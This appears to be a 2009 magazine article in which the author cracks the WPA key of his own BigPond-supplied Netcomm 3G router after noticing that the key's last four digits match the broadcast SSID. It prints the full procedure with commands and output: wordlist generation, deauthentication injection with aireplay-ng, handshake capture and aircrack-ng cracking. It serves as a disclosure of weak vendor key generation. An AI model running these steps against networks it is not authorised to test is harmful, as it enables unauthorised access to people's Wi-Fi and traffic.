A Little Fish in a BigPond

by kawarimono@bigpond.com

After some of the heaviest rainfall in my area in 30 years, I found myself with a flooded basement and most of my personal belongings and computer equipment destroyed.

I had to find myself a new place to live and way to connect to the Internet.  I had been connected via an ADSL2+ connection but needed another form of connection while I found a new place to live.  A quick visit to the website of my telco, BigPond, showed a new type of connection available via high-speed wireless 3G.  I mulled over the decision of either a USB 3G card or a 3G router.  The router seemed the best way to go.  I canceled my fixed line and ADSL2+ service and ordered myself a 3G router, allowing me the flexibility of being able to move to a new place at short notice without the hassle of setting up a new account for a fixed line and ADSL service.

A few days later a courier arrived with the router.

After unpacking, I found it was a Netcomm 3G9W rebadged for BigPond.  The router had an 802.11b/g connection and a four-port switch.  Also included in the package was a credit card-sized plastic card with the details for a pre-configured SSID and WPA key for the router's 802.11 WiFi connection.  My first impression was how thoughtful the telco was to pre-configure the router for a Wi-Fi connection for the less technical-minded of their customers, with WPA TKIP PSK offering them at least some form of security and ease of setup.

The only computers I had left after the flood were an Intel 945GCLF Mini-ITX with an Intel Atom processor and my laptop.  I set the 945GCLF up with a Cat 5 connection to the router's four-port switch and, after entering my username and password for the 3G connection in the web interface of the router, I was connected to the Internet.  I also came across a ZyDAS ZD1211 USB Wi-Fi card in a box of parts that was not damaged in the flooding and decided to try out the 802.11 functionality of the router.

Looking at the card the telco had provided, something caught my eye:

SSID: BigPond8686 WPA Key: 0903428686

The last four digits of the SSID and WPA key matched!

This had to be more than a coincidence and definitely required some further investigation.

I had played around with cracking WEP keys using a BackTrack live CD and wondered how easy it would be to crack a WPA key if I knew the last four digits in the key.

A quick search on Google turned up several sites detailing how to use Aircrack-ng to crack a WPA key, showing that you needed to generate a wordlist to feed into Aircrack-ng after capturing the initial authentication handshake.

I knew what the last four digits would be, so I only needed to generate a list of every combination of a six-digit string, for the first half of the key.  Being the lazy type, and not being a fan of reinventing the wheel, I headed back to Google and searched for a wordlist generating script.

I found one written in Perl called wg.pl.

This script is no longer maintained and has now been ported to Ruby by the author.  Not being familiar with Ruby I searched for the original Perl script and found it here: digilander.libero.it/reda/downloads/perl/wg.pl

I have been using Windows 7 RC1 as my primary OS since release, so I downloaded the latest ActiveState Perl distribution and installed it.  I then generated every combination of a six-digit string and sent the output to the BackTrack 4 directory I had on my Windows drive:

C:\> perl C:\Perl\wg.pl -l 6 -u 6 -v 0123456789 > C:\BT4\wordlist.txt

This gave me a text file with a list of every possible 6-digit combination from 000000 to 999999.  I now needed to append the known four digits 8686 to the end of each line in this file.

I knocked up a quick VBScript to perform this, after first creating a blank file WPAKey.txt in the BackTrack 4 directory:

Const ForReading = 1 Const ForWriting = 2 Set objFSO = CreateObject("Scripting.FileSystemObject") Set objInFile = objFSO.OpenTextFile("C:\BT4\wordlist.txt", ForReading) Set objOutFile = objFSO.OpenTextFile("C:\BT4\WPAKey.txt", ForWriting) Do Until objInFile.AtEndOfStream strLine = objInFile.ReadLine strContents = strLine & "8686" objOutFile.WriteLine strContents Loop objInFile.Close objOutFile.Close

I now had a wordlist I could pass to Aircrack-ng for cracking the WPA key.

I set up my laptop to connect to the access point on the router, connected the ZyDAS Wi-Fi card to my Windows 7 workstation, and rebooted into the BackTrack 4 live CD.  Once BackTrack had successfully booted, I ran airmon-ng to set the Wi-Fi card into monitor mode:

# airmon-ng start wlan0 wlan0 ZyDAS 1211 zd1211rw - [phy0] (monitor mode enabled on mon0)

I also tested that the packet capture was functioning by running Airodump-ng:

# airodump-ng wlan0 CH 3 ][ Elapsed: 3 mins ][ 2009-06-04 17:39 ] BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1A:2B:3E:5C:7B 78 254 120 2 11 54 WPA TKIP PSK BigPond8686 BSSID STATION PWR Rate Lost Packets Probes 00:1A:2B:3E:5C:7B 00:1E:2A:F1:4E:D2 30 18-18 0 99

I then needed to start capturing packets between my laptop and the router, using Airodump.ng, to capture the WPA authentication handshake.

I opened another terminal window and forced the laptop to re-authenticate by injecting de-authentication packets:

# aireplay-ng -0 5 -a 00:1A:2B:3E:5C:7B -c 00:1E:2A:F1:4E:D2 wlan0 17:46:55 Waiting for beacon frame (BSSID: 00:1A:2B:3E:5C:7B) on channel 11 17:46:56 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [42|190 ACKs] 17:46:57 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [44|214 ACKs] 17:46:58 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [52|207 ACKs] 17:46:59 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [41|195 ACKs] 17:47:00 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [50|214 ACKs]

At the same time, in another terminal window, I ran Airodump-ng to capture the WPA handshake and output it to a capture file for cracking with Aircrack-ng:

# airodump-ng -c 11 --bssid 00:1A:2B:3E:5C:7B -w psk wlan0 CH 11 ][ Elapsed: 5 mins ][ 2009-06-04 17:48 ][ WPA handshake: 00:1A:2B:3E:5C:7B BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1A:2B:3E:5C:7B 78 100 3220 3084 7 11 54 WPA TKIP PSK BigPond8686 BSSID STATION PWR Rate Lost Packets Probe 00:1A:2B:3E:5C:7B 00:1E:2A:F1:4E:D2 30 18- 9 0 3278 ^C dumping to kismet csv file

After capturing the WPA handshake, I set out to crack they key using Aircrack-ng and the wordlist I had previously generated:

# aircrack-ng -w /mnt/sda2/BT4/WPAKey.txt -b 00:1A:2B:3E:5C:7B psk*.cap Aircrack-ng 1.0 rc2 r1385 [00:05:48] 90344 keys tested (262.66 k/s) KEY FOUND! [ 0903428686 ] Master Key : 5B E2 4B BC F0 0E CC 17 BE 76 30 19 CF D0 6D F2 AE 9D 25 D5 55 99 C2 30 D9 5B 5E 54 04 D3 07 55 Transient Key : CF 11 D9 4A 36 52 4E DC AA B3 F5 C4 8F 64 74 B3 CC FC 64 44 7D 8E EA 42 D2 2C 91 C1 60 6C AC 39 31 18 47 31 43 96 54 37 EA 64 9E 26 2F BA B0 92 72 22 C8 EA E4 D4 4D E6 B1 6C 20 3F 3C F6 9A A9 EAPOL HMAC : 6C E2 A9 DE 49 5B 41 88 8B 02 E1 40 F1 50 5D EA

I had expected this to take some time, especially considering the Intel Atom is not the most powerful of processors, but it was able to crack the key in less than 6 minutes.

This shows that encryption can easily be broken if the method of generating and distributing the keys is flawed.

I rang a friend I knew who also had a BigPond-supplied router from another manufacturer, 2Wire, to see if he had a similar card with his router's SSID and WPA key.  He also had been supplied with a card, but the SSID's last four digits did not correspond to the last four digits of the WPA key.

For his router, they had used the first four-digits of the devices serial number for the last four digits of the WPA key.  At least, for him, the digits weren't broadcast for all to see, as was the case with the SSID on my router, but the key was still not randomly generated.

Details of Router: www.netcomm.com.au/products/3g/3g9wb

Manual for Router: netcomm.com.au/__data/assets/file/0009/52299/3G9W_User_Guide.pdf

BackTrack 4 Beta: www.remote-exploit.org/backtrack_download.html

Perl Word Generator Script: digilander.libero.it/reda/downloads/perl/wg.pl

Aircrack-ng against WPA: sites.google.com/site/clickdeathsquad/Home/cds-wpacrack

Code: append.vbs